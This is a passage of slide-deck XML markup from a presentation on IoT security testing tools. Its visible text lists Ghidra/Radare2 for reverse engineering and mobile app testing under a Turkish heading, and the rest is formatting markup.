                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" u="none" cap="none" strike="noStrike"/>
                        <a:t>Mobil uygulama testi</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="672500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike"/>
                        <a:t>Ghidra/Radare2</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1100" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" u="none" cap="none" strike="noStrike"/>
                        <a:t>Reverse engineering</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584150" y="924400"/>
            <a:ext cx="3000000" cy="30000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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🛠️ 5. IoT Güvenlik Testi Araçları</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p2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